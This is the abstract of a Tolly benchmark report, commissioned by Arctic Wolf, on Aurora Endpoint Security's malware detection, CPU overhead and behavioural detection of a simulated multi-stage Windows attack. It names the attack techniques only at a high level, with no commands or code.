Abstract

Arctic Wolf commissioned Tolly to benchmark the threat protection efficacy, system resource consumption, and endpoint detection & response features of its Aurora Endpoint Security solution in a Windows 11 environment. 

Arctic Wolf’s Aurora Endpoint Security is presented in this Tolly evaluation as an endpoint protection platform designed to balance strong malware prevention with low system overhead, while also extending into behavioral endpoint detection and response. The report focuses on two practical enterprise concerns: whether the product can stop current malware effectively, and whether it can do so without consuming so many endpoint resources that user productivity suffers. Tolly evaluated Aurora in a Windows 11 Pro 2024H2 environment running on an Azure virtual machine with a 2.3GHz Intel Xeon processor, 8GB of RAM, and 16GB of storage.  

In malware-protection testing, Aurora Endpoint Security achieved a 100% detection and quarantine rate against a folder containing 1,000 recent malware samples sourced from major public repositories. The samples were delivered in a password-protected ZIP file so engineers could control when scanning began, and the endpoint had Internet access so the product could use both local intelligence and centralized threat databases during analysis. Tolly repeated the test with two separate 1,000-sample subsets and reported consistent detection results across runs.  

Resource consumption was a major part of the evaluation. During active scanning, Aurora used approximately 33% average CPU, as measured with Microsoft Resource Monitor and one-second perfmon sampling. Tolly positions this as a favorable result for enterprises that need continuous protection but cannot tolerate excessive endpoint slowdown, especially in resource-constrained or operational technology environments. The report notes that while the specific test scenario is intentionally demanding, it demonstrates that Aurora can sustain effective scanning without imposing unusually high CPU load.  

Tolly also evaluated Aurora Focus, the platform’s behavioral EDR capability. In a multi-stage attack simulation that included encoded PowerShell execution, payload staging, MSHTA UAC bypass, LSASS credential dumping, scheduled task persistence, Windows event log clearing, and BitAdmin-based exfiltration, Aurora Focus detected every stage of the attack chain in observability mode. With autonomous response enabled, it stopped the attack at the first stage by terminating the encoded PowerShell process and executing evidence-collection playbooks. Tolly further notes that these detection and response functions continued to operate even when cloud connectivity was removed, and that the product mapped detections to the MITRE ATT&CK framework while using an embedded AI assistant to explain suspicious behavior and command-line context.  

Overall, the report presents Aurora Endpoint Security as a combination of high efficacy, comparatively low CPU impact, and advanced behavioral protection. The result is positioned as a fit for organizations that need both strong prevention against known malware and effective detection and interruption of multi-stage attacks that traditional signature-based tools may miss.